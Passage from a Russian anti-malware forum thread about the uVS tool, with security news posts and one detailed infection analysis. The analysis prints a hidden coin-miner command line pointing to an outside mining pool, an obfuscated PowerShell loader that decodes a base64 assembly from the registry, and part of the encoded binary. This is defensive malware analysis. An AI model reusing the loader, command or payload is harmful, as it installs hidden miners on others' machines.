поговорить о uVS, Carberp, планете Земля

RSS

Сообщений: 6770

Баллов: 5416

Регистрация: 12.09.2011

Размещено 21.11.2011 19:06:42

Обсуждаем Carberp всех модификаций

Цитата
;uVS v3.71 script [http://dsrt.dyndns.org] zoo %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE bl 6D99C48BBD436116B78A04997D854F57 164352 delall %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE delall %SystemDrive%\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\ICQ\ICQNEWTAB\NEWTAB.HTML regt 1 regt 2 regt 7 regt 18 deltmp delnfr restart

Цитата

;uVS v3.71 script [http://dsrt.dyndns.org]

zoo %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE
bl 6D99C48BBD436116B78A04997D854F57 164352
delall %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE
delall %SystemDrive%\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\ICQ\ICQNEWTAB\NEWTAB.HTML
regt 1
regt 2
regt 7
regt 18
deltmp
delnfr
restart

Изменено: Арвид - 22.11.2011 13:07:19

Правильно заданный вопрос - это уже половина ответа

Ответы

Пред. 1 ... 148 149 150 151 152 ... 167 След.

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 07.11.2019 18:12:35

Symantec
Всё...
Broadcom выкупил Symantec > название меняется на NortonLifeLock > Компания фактически уйдёт от антивирусной защиты...

Цитата
Новая компания будет больше уделять внимание сервисам для усиления приватности и защиты персональных данных, а не антивирусной защите.

https://www.comss.ru/page.php?id=6654
-----------
Кто следующий на выход ?

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 08.11.2019 17:42:05

Цитата

RP55 RP55 написал:
Symantec
Всё...
Broadcom выкупил Symantec > название меняется на NortonLifeLock > Компания фактически уйдёт от антивирусной защиты...

Цитата
Новая компания будет больше уделять внимание сервисам для усиления приватности и защиты персональных данных, а не антивирусной защите.

https://www.comss.ru/page.php?id=6654
-----------
Кто следующий на выход ?

возможно на шифровании сделают акцент, а антивирусная защита, это только часть спектра информационной безопасности.
В 2010 году Symantec Corp. выкупил PGP за 300 млн долларов

[ Как создать образ автозапуска? ]

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 28.11.2019 16:48:09

Релиз AdwCleaner 8.0.0: прекращена поддержка Windows XP и Vista
Malwarebytes обновила ядро AdwCleaner.

https://www.comss.ru/page.php?id=6736

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 28.11.2019 19:52:22

Цитата
RP55 RP55 написал: Релиз AdwCleaner 8.0.0:

интерфейс остался прежним, в отличие от mbam 4

[ Как создать образ автозапуска? ]

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 23.12.2019 15:54:55

Немного о 2FA: Двухфакторная аутентификация

Цитата
Двухфакторная аутентификация или 2FA – это метод идентификации пользователя в каком-либо сервисе, где используются два различных типа аутентификационных данных. Введение дополнительного уровня безопасности обеспечивает более эффективную защиту аккаунта от несанкционированного доступа.

Цитата

Двухфакторная аутентификация или 2FA – это метод идентификации пользователя в каком-либо сервисе, где используются два различных типа аутентификационных данных. Введение дополнительного уровня безопасности обеспечивает более эффективную защиту аккаунта от несанкционированного доступа.

https://habr.com/ru/company/1cloud/blog/277901/

[ Как создать образ автозапуска? ]

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 14.01.2020 20:23:43

В коде Microsoft обнаружена ошибка, ( crypt32.dll ) которая отвечает за проверку цифровых подписей, что потенциально позволяет подделать подпись файла и установить на компьютер вредоносное ПО.
Ошибку обнаружили в АНБ и первоначально засекретили.

https://krebsonsecurity.com/2020/01/cryptic-rumblings-ahead-of-first-2020-patch-tuesday/

Изменено: RP55 RP55 - 14.01.2020 20:24:56

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 21.01.2020 20:51:15

Антивирусы получают обновления для борьбы с новым методом атаки шифровальщиков на EFS
Система шифрования данных (Encrypting File System, EFS) может злонамеренно использоваться программами-вымогателями.
https://www.comss.ru/page.php?id=6936

Компании разработчики _разрабатывают методы защиты...

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 18.02.2020 16:16:49

https://vpk.name/news/376011_skrytnaya_kamera_u_razvedchikov_poyavitsya_golograficheskii_fotoapparat.html

фотокамера позволит делать снимки и сразу их зашифровывать.
структура голограммы является ключом к шифру, который устройство постоянно изменяет.

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 07.03.2020 18:59:02

по активным сейчас темам Trojan.Multi.GenAutorunProc.a на некоторых форумах что можно сказать.

симптомы, пример:

Цитата
заметил, что моя любимая игрушка начала тормозить, включил msi afterburner с выводом информации про загрузку и температуру процессора на экран, загрузка достигала 50-100% на всех 8 ядрах. Решил открыть диспетчер задач, он показал что процессор загружен на 10-15%, не закрывая диспетчер задач зашел в игру, мси афтербернер показал 10-15%, игра перестала тормозить, закрыл диспетчер задач и игра снова стала тормозить. Я скачал прогу system explorer и она показала запущенный процесс notepad.exe, который потребляет 37,5% процессора. при открытии снова диспетчера задач, notepad.exe скрылся из запущенных процессов в system explorer, после закрытия диспетчера задач, notepad.exe снова запустился.

Цитата

заметил, что моя любимая игрушка начала тормозить, включил msi afterburner с выводом информации про загрузку и температуру процессора на экран, загрузка достигала 50-100% на всех 8 ядрах. Решил открыть диспетчер задач, он показал что процессор загружен на 10-15%, не закрывая диспетчер задач зашел в игру, мси афтербернер показал 10-15%, игра перестала тормозить, закрыл диспетчер задач и игра снова стала тормозить. Я скачал прогу system explorer и она показала запущенный процесс notepad.exe, который потребляет 37,5% процессора. при открытии снова диспетчера задач, notepad.exe скрылся из запущенных процессов в system explorer, после закрытия диспетчера задач, notepad.exe снова запустился.

довольно интересная картина происходит, которая может быть скрыта за текстовыми логами.

есть свежая задача Win32Utilities, из которой запущена dll
C:\Users\Pro\AppData\Roaming\WindowsShell\WindowsDiagnostics.dll
6,00 кб, rsAh, создан: 03.03.2020 19:11:07, изменен: 03.03.2020 19:39:19
следующим образом:
rundll32.exe C:\Users\Pro\AppData\Roaming\WindowsShell\WindowsDiagnostics.dll,Task
и все.

что мы видим в образе автозапуска:
во первых обнаружены потоки внедренные в процесс notepad.exe
(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\NOTEPAD.EXE [1860], tid=9912
во вторых, видим процесс, связанный так или иначе с запуском notepad.exe, явно связанный с майнером

Цитата
notepad.exe -o playgrounddonate.sytes.net:5555 -u NoFile -p x --randomx-mode=light --threads=4 -k --nicehash --donate-level=0

а так же видим процессы связанные с запуском powershell

Цитата
"powershell" -ExecutionPolicy Bypass -NoExit -NoProfile -Command $s = (Get-ItemProperty HKCU:\Software\WinSys32\).win;$r = $s.replace('.', '2').replace('(', '3').replace('-', '1'); $b = [System.Convert]::FromBase64String($r);[System.Reflection.Assembly]::Load($b);[GAS.Ad]::CU();Exit(0);

судя по командной строке, часть командной строки формируется из ключа HKCU:\Software\WinSys32, можно предположить, что значение ключа закодировано в base64

каким образом запущены процессы с участием powershell?
а вот отсюда, часть содержимого windowsdiagnostic.dll:

Цитата
Maindir Task a p p d a t a \ W i n d o w s S h e l l p o w e r s h e l l ‚%- E x e c u t i o n P o l i c y B y p a s s - N o E x i t - N o P r o f i l e - C o m m a n d $ s = ( G e t - I t e m P r o p e r t y H K C U : \ S o f t w a r e \ W i n S y s 3 2 \ ) . w i n ; $ r = $ s . r e p l a c e ( ' . ' , ' 2 ' ) . r e p l a c e ( ' ( ' , ' 3 ' ) . r e p l a c e ( ' - ' , ' 1 ' ) ; $ b = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r ) ; [ S y s t e m . R e f l e c t i o n . A s s e m b l y ] : : L o a d ( $ b ) ; [ G A S . A d ] : : C U ( ) ; E x i t ( 0 )

Цитата

Maindir Task a p p d a t a \ W i n d o w s S h e l l p o w e r s h e l l ‚%- E x e c u t i o n P o l i c y B y p a s s - N o E x i t - N o P r o f i l e - C o m m a n d $ s = ( G e t - I t e m P r o p e r t y H K C U : \ S o f t w a r e \ W i n S y s 3 2 \ ) . w i n ; $ r = $ s . r e p l a c e ( ' . ' , ' 2 ' ) . r e p l a c e ( ' ( ' , ' 3 ' ) . r e p l a c e ( ' - ' , ' 1 ' ) ; $ b = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r ) ; [ S y s t e m . R e f l e c t i o n . A s s e m b l y ] : : L o a d ( $ b ) ; [ G A S . A d ] : : C U ( ) ; E x i t ( 0 )

какая связь между процессом powershell и notepad?

а вот и явная связь.

по образу видим, что pid=8960 соответствует cmdline:

Цитата
"powershell" -ExecutionPolicy Bypass -NoExit -NoProfile -Command $s = (Get-ItemProperty HKCU:\Software\WinSys32\).win;$r = $s.replace('.', '2').replace('(', '3').replace('-', '1'); $b = [System.Convert]::FromBase64String($r);[System.Reflection.Assembly]::Load($b);[GAS.Ad]::CU();Exit(0);

а в инфо по notepad видим, что pid=1860 созданный cmdline

Цитата
"notepad.exe -o playgrounddonate.sytes.net:5555 -u NoFile -p x --randomx-mode=light --threads=4 -k --nicehash --donate-level=0"

но родительский процесс для него parentid=8960

остается только найти значение ключа HKCU:\Software\WinSys32, чтобы убедиться, что в нем содержится base64 значение

действительно, ключ содержит base64 код

Цитата
Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\WinSys32] "win"="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG-vZGUuDQ0KJAAAAAAAAABQRQAAZIYDAJPF0tgAAAAAAAAAAPAALiALAgYAAPoAAAAIAAAAAAAAAAAAAAAgAAAAAEAAAAAAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAABgAQAABAAAAAAAAAMAQIUAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAAAAAAABAAQAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAghgBABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAACT5AAAAIAAAAPoAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnNkYXRhAAD-AQAAACABAAACAAAA/gAAAAAAAAAAAAAAAAAAQAAAwC5yc(JjAAAAAAQAAABAAQAABAAAAAABAAAAAAAAAAAAAAAAAEAAAEAucmVsb.MAAAwAAAAAYAEAAAIAAAAEAQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAQAAAAAASAAAAAIABQBAoAAAqloAAAkAAAAAAAAA6voAABgdAAACGAEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzADAKYAAAABAAARKwkoUtEZORQWmiYWLfkXKAsAAAY6YwAAACYgBAAAADg.AAAAEgAoAgAABiYgBQAAADgkAAAAEgAGjAMAAAIoCAAABn0BAAAEOCoAAAAgBAAAAP4OAQD+DAEARQYAAAAQAAAAv////wAAAACt////EAAAACIAAAA4qP///yYgAwAAADjT////EgD+FQMAAAIgAQAAADjB////KAkAAA

Цитата

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\WinSys32]
"win"="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG-vZGUuDQ0KJAAAAAAAAABQRQAAZIYDAJPF0tgAAAAAAAAAAPAALiALAgYAAPoAAAAIAAAAAAAAAAAAAAAgAAAAAEAAAAAAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAABgAQAABAAAAAAAAAMAQIUAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAAAAAAABAAQAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAghgBABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAACT5AAAAIAAAAPoAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnNkYXRhAAD-AQAAACABAAACAAAA/gAAAAAAAAAAAAAAAAAAQAAAwC5yc(JjAAAAAAQAAABAAQAABAAAAAABAAAAAAAAAAAAAAAAAEAAAEAucmVsb.MAAAwAAAAAYAEAAAIAAAAEAQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAQAAAAAASAAAAAIABQBAoAAAqloAAAkAAAAAAAAA6voAABgdAAACGAEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzADAKYAAAABAAARKwkoUtEZORQWmiYWLfkXKAsAAAY6YwAAACYgBAAAADg.AAAAEgAoAgAABiYgBQAAADgkAAAAEgAGjAMAAAIoCAAABn0BAAAEOCoAAAAgBAAAAP4OAQD+DAEARQYAAAAQAAAAv////wAAAACt////EAAAACIAAAA4qP///yYgAwAAADjT////EgD+FQMAAAIgAQAAADjB////KAkAAA

после декодирования получаем бинарный файл

+
update:
теперь вирлаб детектирует его как майнер.
ESET-NOD32: A Variant Of MSIL/CoinMiner.BDW
https://www.virustotal.com/gui/file/bdca7dd1be0f230efd68cfb824b73a7bf0e326ed39147011b5f858370d9e2869/detection

Прикрепленные файлы

bin_file.jpg (143.98 КБ)

[ Как создать образ автозапуска? ]

Сообщений: 6234

Баллов: 4987

Регистрация: 25.05.2010

Размещено 10.03.2020 21:44:37

По поводу Подписанных\Не подписанных файлов Windows

SHA-2
https://support.microsoft.com/ru-ru/help/4472027/2019-sha-2-code-signing-support-requirement-for-windows-and-wsus

https://support.microsoft.com/ru-ru/help/4474419/sha-2-code-signing-support-update

Пред. 1 ... 148 149 150 151 152 ... 167 След.